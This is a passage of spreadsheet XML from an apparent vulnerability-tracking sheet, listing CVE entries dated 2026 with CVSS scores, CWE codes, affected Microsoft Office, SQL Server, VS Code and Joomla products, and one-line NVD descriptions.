        </is>
      </c>
      <c r="G357" s="5" t="inlineStr"/>
      <c r="H357" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I357" s="5" t="inlineStr"/>
      <c r="J357" s="5" t="inlineStr"/>
      <c r="K357" s="5" t="inlineStr"/>
      <c r="L357" s="5" t="inlineStr"/>
      <c r="M357" s="5" t="inlineStr"/>
      <c r="N357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O357" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P357" s="5" t="inlineStr"/>
      <c r="Q357" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R357" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - miniorgange.com - Unauthenticated arbitrary extension deinstallation via various miniOrange extensions - a missing authentication check allows unauthenticated actors to delete arbitrary installed extensions. Only the free versions of the miniOrange plugins are affected.</t>
        </is>
      </c>
      <c r="S357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78074</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78439</t>
        </is>
      </c>
      <c r="D358" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E358" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F358" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I358" s="5" t="inlineStr"/>
      <c r="J358" s="5" t="inlineStr"/>
      <c r="K358" s="5" t="inlineStr"/>
      <c r="L358" s="5" t="inlineStr"/>
      <c r="M358" s="5" t="inlineStr"/>
      <c r="N358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O358" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P358" s="5" t="inlineStr"/>
      <c r="Q358" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R358" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78439</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78442</t>
        </is>
      </c>
      <c r="D359" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E359" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F359" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I359" s="5" t="inlineStr"/>
      <c r="J359" s="5" t="inlineStr"/>
      <c r="K359" s="5" t="inlineStr"/>
      <c r="L359" s="5" t="inlineStr"/>
      <c r="M359" s="5" t="inlineStr"/>
      <c r="N359" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O359" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P359" s="5" t="inlineStr"/>
      <c r="Q359" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R359" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows OLE DB allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78442</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78456</t>
        </is>
      </c>
      <c r="D360" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E360" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F360" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I360" s="5" t="inlineStr"/>
      <c r="J360" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K360" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2022</t>
        </is>
      </c>
      <c r="L360" s="5" t="inlineStr"/>
      <c r="M360" s="5" t="inlineStr"/>
      <c r="N360" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O360" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P360" s="5" t="inlineStr"/>
      <c r="Q360" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R360" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78456</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78462</t>
        </is>
      </c>
      <c r="D361" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E361" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F361" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G361" s="5" t="inlineStr"/>
      <c r="H361" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I361" s="5" t="inlineStr"/>
      <c r="J361" s="5" t="inlineStr"/>
      <c r="K361" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L361" s="5" t="inlineStr"/>
      <c r="M361" s="5" t="inlineStr"/>
      <c r="N361" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O361" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P361" s="5" t="inlineStr"/>
      <c r="Q361" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R361" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through user-controlled key in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78462</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78463</t>
        </is>
      </c>
      <c r="D362" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E362" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F362" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G362" s="5" t="inlineStr"/>
      <c r="H362" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I362" s="5" t="inlineStr"/>
      <c r="J362" s="5" t="inlineStr"/>
      <c r="K362" s="5" t="inlineStr"/>
      <c r="L362" s="5" t="inlineStr"/>
      <c r="M362" s="5" t="inlineStr"/>
      <c r="N362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O362" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P362" s="5" t="inlineStr"/>
      <c r="Q362" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R362" s="5" t="inlineStr">
        <is>
          <t>Improper control of generation of code ('code injection') in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78463</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78504</t>
        </is>
      </c>
      <c r="D363" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E363" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F363" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I363" s="5" t="inlineStr"/>
      <c r="J363" s="5" t="inlineStr"/>
      <c r="K363" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L363" s="5" t="inlineStr"/>
      <c r="M363" s="5" t="inlineStr"/>
      <c r="N363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O363" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P363" s="5" t="inlineStr"/>
      <c r="Q363" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R363" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78504</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78505</t>
        </is>
      </c>
      <c r="D364" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E364" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F364" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I364" s="5" t="inlineStr"/>
      <c r="J364" s="5" t="inlineStr"/>
      <c r="K364" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L364" s="5" t="inlineStr"/>
      <c r="M364" s="5" t="inlineStr"/>
      <c r="N364" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O364" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P364" s="5" t="inlineStr"/>
      <c r="Q364" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R364" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78505</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78507</t>
        </is>
      </c>
      <c r="D365" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E365" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F365" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I365" s="5" t="inlineStr"/>
      <c r="J365" s="5" t="inlineStr"/>
      <c r="K365" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L365" s="5" t="inlineStr"/>
      <c r="M365" s="5" t="inlineStr"/>
      <c r="N365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O365" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P365" s="5" t="inlineStr"/>
      <c r="Q365" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R365" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78507</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78511</t>
        </is>
      </c>
      <c r="D366" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E366" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F366" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I366" s="5" t="inlineStr"/>
      <c r="J366" s="5" t="inlineStr"/>
      <c r="K366" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L366" s="5" t="inlineStr"/>
      <c r="M366" s="5" t="inlineStr"/>
      <c r="N366" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O366" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P366" s="5" t="inlineStr"/>
      <c r="Q366" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R366" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78511</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78512</t>
        </is>
      </c>
      <c r="D367" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E367" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F367" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I367" s="5" t="inlineStr"/>
      <c r="J367" s="5" t="inlineStr"/>
      <c r="K367" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L367" s="5" t="inlineStr"/>
      <c r="M367" s="5" t="inlineStr"/>
      <c r="N367" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O367" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P367" s="5" t="inlineStr"/>
      <c r="Q367" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="R367" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78512</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78514</t>
        </is>
      </c>
      <c r="D368" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E368" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F368" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G368" s="5" t="inlineStr"/>
      <c r="H368" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I368" s="5" t="inlineStr"/>
      <c r="J368" s="5" t="inlineStr"/>
      <c r="K368" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L368" s="5" t="inlineStr"/>
      <c r="M368" s="5" t="inlineStr"/>
      <c r="N368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O368" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P368" s="5" t="inlineStr"/>
      <c r="Q368" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R368" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78514</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78517</t>
        </is>
      </c>
      <c r="D369" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E369" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F369" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G369" s="5" t="inlineStr"/>
      <c r="H369" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I369" s="5" t="inlineStr"/>
      <c r="J369" s="5" t="inlineStr"/>
      <c r="K369" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L369" s="5" t="inlineStr"/>
      <c r="M369" s="5" t="inlineStr"/>
      <c r="N369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O369" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P369" s="5" t="inlineStr"/>
      <c r="Q369" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R369" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78517</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78518</t>
        </is>
      </c>
      <c r="D370" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E370" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F370" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G370" s="5" t="inlineStr"/>
      <c r="H370" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I370" s="5" t="inlineStr"/>
      <c r="J370" s="5" t="inlineStr"/>
      <c r="K370" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L370" s="5" t="inlineStr"/>
      <c r="M370" s="5" t="inlineStr"/>
      <c r="N370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O370" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P370" s="5" t="inlineStr"/>
      <c r="Q370" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="R370" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78518</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78519</t>
        </is>
      </c>
      <c r="D371" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E371" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F371" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G371" s="5" t="inlineStr"/>
      <c r="H371" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I371" s="5" t="inlineStr"/>
      <c r="J371" s="5" t="inlineStr"/>
      <c r="K371" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t>
        </is>
      </c>
      <c r="L371" s="5" t="inlineStr"/>
      <c r="M371" s="5" t="inlineStr"/>
      <c r="N371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O371" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P371" s="5" t="inlineStr"/>
      <c r="Q371" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="R371" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78519</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78521</t>
        </is>
      </c>
      <c r="D372" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E372" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F372" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I372" s="5" t="inlineStr"/>
      <c r="J372" s="5" t="inlineStr"/>
      <c r="K372" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L372" s="5" t="inlineStr"/>
      <c r="M372" s="5" t="inlineStr"/>
      <c r="N372" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O372" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P372" s="5" t="inlineStr"/>
      <c r="Q372" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R372" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78521</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78524</t>
        </is>
      </c>
      <c r="D373" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E373" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F373" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I373" s="5" t="inlineStr"/>
      <c r="J373" s="5" t="inlineStr"/>
      <c r="K373" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L373" s="5" t="inlineStr"/>
      <c r="M373" s="5" t="inlineStr"/>
      <c r="N373" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O373" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P373" s="5" t="inlineStr"/>
      <c r="Q373" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R373" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78524</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78525</t>
        </is>
      </c>
      <c r="D374" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E374" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F374" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I374" s="5" t="inlineStr"/>
      <c r="J374" s="5" t="inlineStr"/>
      <c r="K374" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L374" s="5" t="inlineStr"/>
      <c r="M374" s="5" t="inlineStr"/>
      <c r="N374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O374" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P374" s="5" t="inlineStr"/>
      <c r="Q374" s="5" t="inlineStr">
        <is>
